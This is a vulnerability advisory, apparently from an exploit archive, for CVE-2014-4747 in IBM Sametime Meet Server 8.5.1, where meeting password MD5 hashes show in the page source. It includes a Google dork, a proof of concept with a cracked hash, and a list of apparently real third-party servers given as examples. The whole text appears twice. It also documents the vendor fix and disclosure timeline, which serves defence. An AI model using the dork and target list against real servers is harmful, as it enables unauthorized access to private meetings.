# Exploit Title: IBM Sametime Meet Server 8.5 Password Disclosure
# Google Dork: intitle:"Meeting Center - IBM Lotus Sametime"
# Date: 11/08/2014
# CVSS Score: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=AV:L/AC:L/Au:N/C:P/I:N/A:N
# CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4747
# OSVDB-ID: http://osvdb.org/109443
#
# Author: Adriano Marcio Monteiro
# E-mail: adrianomarciomonteiro@gmail.com
# Blog: http://www.brazucasecurity.com.br
#
# Vendor: http://www.ibm.com
# Software: http://www.ibm.com/sametime
# Version: 8.5.1
# Advisory: https://www-304.ibm.com/support/docview.wss?uid=swg21679221
#
# Test Type: Black Box
# Tested on: Windows 7 Enterprise SP1 x86 pt-br, Mozilla Firefox 30.0 /Internet Explorer 10 / Google Chrome Versão 33.0.1750.146 m
Table of Contents
[0x00] The Vulnerability
[0x01] Exploit Description
[0x02] PoC - Proof of Concept
[0x03] Correction or Workaround
[0x04] Timeline
[0x05] Published
[0x06] References
[0x07] Bibliography
[0x00] The Vulnerabilty
Password Disclosure
Revealing system data or debugging information helps an adversary learn about the system and form a plan of attack. An information leak occurs when system data or debugging information leaves the program through an output stream or logging function.
[0x01] Exploit Description
On the page that allows editing a meeting is possible to retrieve the MD5 hash of the password of the meeting just by reading the HTML source code of the page.
[0x02] PoC - Proof of Concept
For exploit this vulnerability you only need to analyze the source code of page.
http://sametime02.myserver.com.br/stconf.nsf/meeting/8635AEFF1CBFAAF283257D09004602CE?editdocument&1404305088536
[...]
<input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="Password" id="pw">
<input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="ConfirmPassword" id="rpw">
[...]
http://www.md5online.org
E1FAFFB3E614E6C2FBA74296962386B7 -> Found: AAA
Examples:
http://sametime.eletrosul.gov.br/stconf.nsf/frmConference?OpenForm
http://sametime.sp.gov.br/stconf.nsf/frmConference?OpenForm
http://sametime.grude.ufmg.br/stconf.nsf/frmConference?OpenForm
http://sametime.schahin.com.br/stconf.nsf/frmConference?OpenForm
http://sametime.c-pack.com.br/stconf.nsf/frmConference?OpenForm
http://www.azi.com.br/stconf.nsf/frmConference?OpenForm
http://aquila.sealinc.org/stconf.nsf/frmConference?Openform
http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform
http://comware.net/stconf.nsf/frmConference?Openform
https://236ws.dpteruel.es/stconf.nsf/frmConference?OpenForm
https://correoweb.gruposanjose.biz/stconf.nsf/frmConference?Openform
http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform
https://mail.dba.uz/stconf.nsf/frmConference?Openform
[0x03] Correction or Workaround
Apply the procedures described in the follow link:
http://www-01.ibm.com/support/docview.wss?uid=swg21679454
[0x04] Timeline
18/07/2014 - Vulnerabilities discovered
19/07/2014 - Vulnerabilities reporteds to IBM PSIRT Team
23/07/2014 - Advisory and troubleshooting fix published
[0x05] Published
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4747
http://www.securityfocus.com/bid/68823
[0x06] References
Information Leakage
https://www.owasp.org/index.php/Information_Leakage
CWE-200: Information Exposure
http://cwe.mitre.org/data/definitions/200.html
[0x07] Bibliography
http://www-10.lotus.com/ldd/stwiki.nsf/xpDocViewer.xsp?lookupName=Administering+Sametime+Standard+8.5.2+documentation#action=openDocument&res_title=Sametime_Meeting_Server_st852&content=pdcontent
[end]
# Google Dork: intitle:"Meeting Center - IBM Lotus Sametime"
# Date: 11/08/2014
# CVSS Score: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=AV:L/AC:L/Au:N/C:P/I:N/A:N
# CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4747
# OSVDB-ID: http://osvdb.org/109443
#
# Author: Adriano Marcio Monteiro
# E-mail: adrianomarciomonteiro@gmail.com
# Blog: http://www.brazucasecurity.com.br
#
# Vendor: http://www.ibm.com
# Software: http://www.ibm.com/sametime
# Version: 8.5.1
# Advisory: https://www-304.ibm.com/support/docview.wss?uid=swg21679221
#
# Test Type: Black Box
# Tested on: Windows 7 Enterprise SP1 x86 pt-br, Mozilla Firefox 30.0 /Internet Explorer 10 / Google Chrome Versão 33.0.1750.146 m
Table of Contents
[0x00] The Vulnerability
[0x01] Exploit Description
[0x02] PoC - Proof of Concept
[0x03] Correction or Workaround
[0x04] Timeline
[0x05] Published
[0x06] References
[0x07] Bibliography
[0x00] The Vulnerabilty
Password Disclosure
Revealing system data or debugging information helps an adversary learn about the system and form a plan of attack. An information leak occurs when system data or debugging information leaves the program through an output stream or logging function.
[0x01] Exploit Description
On the page that allows editing a meeting is possible to retrieve the MD5 hash of the password of the meeting just by reading the HTML source code of the page.
[0x02] PoC - Proof of Concept
For exploit this vulnerability you only need to analyze the source code of page.
http://sametime02.myserver.com.br/stconf.nsf/meeting/8635AEFF1CBFAAF283257D09004602CE?editdocument&1404305088536
[...]
<input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="Password" id="pw">
<input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="ConfirmPassword" id="rpw">
[...]
http://www.md5online.org
E1FAFFB3E614E6C2FBA74296962386B7 -> Found: AAA
Examples:
http://sametime.eletrosul.gov.br/stconf.nsf/frmConference?OpenForm
http://sametime.sp.gov.br/stconf.nsf/frmConference?OpenForm
http://sametime.grude.ufmg.br/stconf.nsf/frmConference?OpenForm
http://sametime.schahin.com.br/stconf.nsf/frmConference?OpenForm
http://sametime.c-pack.com.br/stconf.nsf/frmConference?OpenForm
http://www.azi.com.br/stconf.nsf/frmConference?OpenForm
http://aquila.sealinc.org/stconf.nsf/frmConference?Openform
http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform
http://comware.net/stconf.nsf/frmConference?Openform
https://236ws.dpteruel.es/stconf.nsf/frmConference?OpenForm
https://correoweb.gruposanjose.biz/stconf.nsf/frmConference?Openform
http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform
https://mail.dba.uz/stconf.nsf/frmConference?Openform
[0x03] Correction or Workaround
Apply the procedures described in the follow link:
http://www-01.ibm.com/support/docview.wss?uid=swg21679454
[0x04] Timeline
18/07/2014 - Vulnerabilities discovered
19/07/2014 - Vulnerabilities reporteds to IBM PSIRT Team
23/07/2014 - Advisory and troubleshooting fix published
[0x05] Published
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4747
http://www.securityfocus.com/bid/68823
[0x06] References
Information Leakage
https://www.owasp.org/index.php/Information_Leakage
CWE-200: Information Exposure
http://cwe.mitre.org/data/definitions/200.html
[0x07] Bibliography
http://www-10.lotus.com/ldd/stwiki.nsf/xpDocViewer.xsp?lookupName=Administering+Sametime+Standard+8.5.2+documentation#action=openDocument&res_title=Sametime_Meeting_Server_st852&content=pdcontent
[end]
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information